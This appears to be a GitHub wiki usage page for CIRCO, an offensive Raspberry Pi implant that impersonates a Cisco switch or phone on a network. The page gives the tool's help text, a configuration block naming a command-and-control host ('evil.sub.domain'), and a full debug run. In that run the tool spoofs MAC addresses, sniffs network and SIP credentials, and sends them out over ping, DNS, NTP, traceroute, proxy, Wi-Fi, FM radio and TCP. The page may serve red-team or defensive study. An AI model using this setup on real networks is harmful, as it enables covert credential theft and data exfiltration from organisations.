CIRCO Usage
Emilio edited this page Aug 7, 2020 · 3 revisions
(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py
____ ___ ____ ____ ___
/ ___|_ _| _ \ / ___/ _ \
| | | || |_) | | | | | |
| |___ | || _ <| |__| |_| |
\____|___|_| \_\\____\___/
Author: Emilio / @ekio_jp
Version: 2.020
usage: circo.py [-h] [-v] (-i <eth0> | -b) [-A] [-p] [-t] [-d] [-x] [-n] [-f]
[-w <wlan1>] [--tcp 80] [--spoof] [--voip] [-l <logfile>]
optional arguments:
-h, --help show this help message and exit
-v, --verbose Enable debugging
-i <eth0> Single Mode: <eth0>
-b, --bridge Bridge Mode: Use eth0 & eth1
-A, --ALL All exfiltration
-p, --ping PING exfiltration
-t, --trace Traceroute exfiltration
-d, --dns DNS exfiltration
-x, --prx Proxy exfiltration
-n, --ntp NTP exfiltration
-f, --fm FM DRS exfiltration
-w <wlan1> Wireles exfiltration
--tcp 80 TCP exfiltration
--spoof Spoofing MAC/IP (Proxy Excluded)
--voip Collect RTP and SIP credentials
-l <logfile> Log File (default <timestamp>.log
(venv) root@circov2020:/home/pi-enc/v2020#
Using -v will print out the program flow and also when credentials have been sent out.
The -i eth0 (single mode) or -b (bridge mode) option is mandatory: we need one LAN NIC to act as a Phone/Switch (single mode), or 2 LAN NICs (eth0 to the switch and eth1 to the phone) for bridge mode.
Exfiltration modes are optional; you can combine several of them or use -A.
Note that -w wlan1 needs a wireless NIC adapter capable of packet injection. I found using the onboard Raspberry PI wireless is unstable, so I opt for a USB wireless dongle (RT3080/RT3070), which works out-of-the-box with Raspbian.
--spoof will pick up a MAC/IP from eth1 and use those for exfiltration.
--voip will capture RTP and SIP pcaps in the Captures directory.
-l logs credentials to a file.
PHRASE='Waaaaa! awesome :)'
SALT='salgruesa'
SEED1=1000
SEED2=5000
SEED3=8000
MAGIC=666
WIFICHAN=10
SWMAC='00:07:B4:00:FA:DE'
INT='FastEthernet0/3'
PHONEMAC='10:8C:CF:75:BB:AA'
SERIAL='FCW1831C1AA'
SNPSU='LIT18300QBB'
SNMPC='public'
CCHOST='200.200.200.300'
CCNAME='evil.sub.domain'
DIRNAME='/home/pi-enc/v2020/'
SSIDROOT='nec-c17c02'
SSIDALARM='pacman'
WIFIMAC='98:f1:99:c1:7c:02'
SNMPTPL='snmpwalk.mib'
TYPE='switch'
FM='87.6'
(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py -v -b -p -t -n -d -x -f --tcp 80 -w wlan1 -l creds.txt
____ ___ ____ ____ ___
/ ___|_ _| _ \ / ___/ _ \
| | | || |_) | | | | | |
| |___ | || _ <| |__| |_| |
\____|___|_| \_\\____\___/
Author: Emilio / @ekio_jp
Version: 2.020
DEBUG:CDP/LLDP peer discovery
DEBUG:Change MAC to fake switch: 00:07:B4:00:FA:DE
DEBUG:DHCP request started
DEBUG:Configure br0 interface
DEBUG:Collect gateway ARP
DEBUG:Starting Proxy Discovery
DEBUG:Found PAC via DHCP: http://10.10.10.1:88/proxy.pac
DEBUG:Starting Net-Creds Sniffer
DEBUG:SNMP fake template created
DEBUG:Starting CDP as switch
DEBUG:Starting LLDP as switch
DEBUG:Starting IOS Telnet
DEBUG:Starting IOS SSH
DEBUG:Starting IOS SNMP
DEBUG:Starting NMAP OS Fooler
DEBUG:Start WIFI wlan1 monitor mode in channel 10
DEBUG:Starting Exfiltration WIFI
DEBUG:Starting Exfiltration PING
DEBUG:Starting Exfiltracion Traceroute
DEBUG:Starting Exfiltracion TCP 80
DEBUG:Starting Exfiltracion NTP
DEBUG:Starting Exfiltracion DNS
DEBUG:Starting Exfiltracion Proxy DNS
DEBUG:Starting Exfiltracion FM
DEBUG:Sending credentials via PING
DEBUG:Sending credentials via Wifi
DEBUG:Sending credentials via NTP
DEBUG:Sending credentials via DNS
DEBUG:Sending credentials via TRACE
DEBUG:Sending credentials via Proxy DNS
DEBUG:Sending credentials via FM 87.6
DEBUG:Sending credentials via TCP 80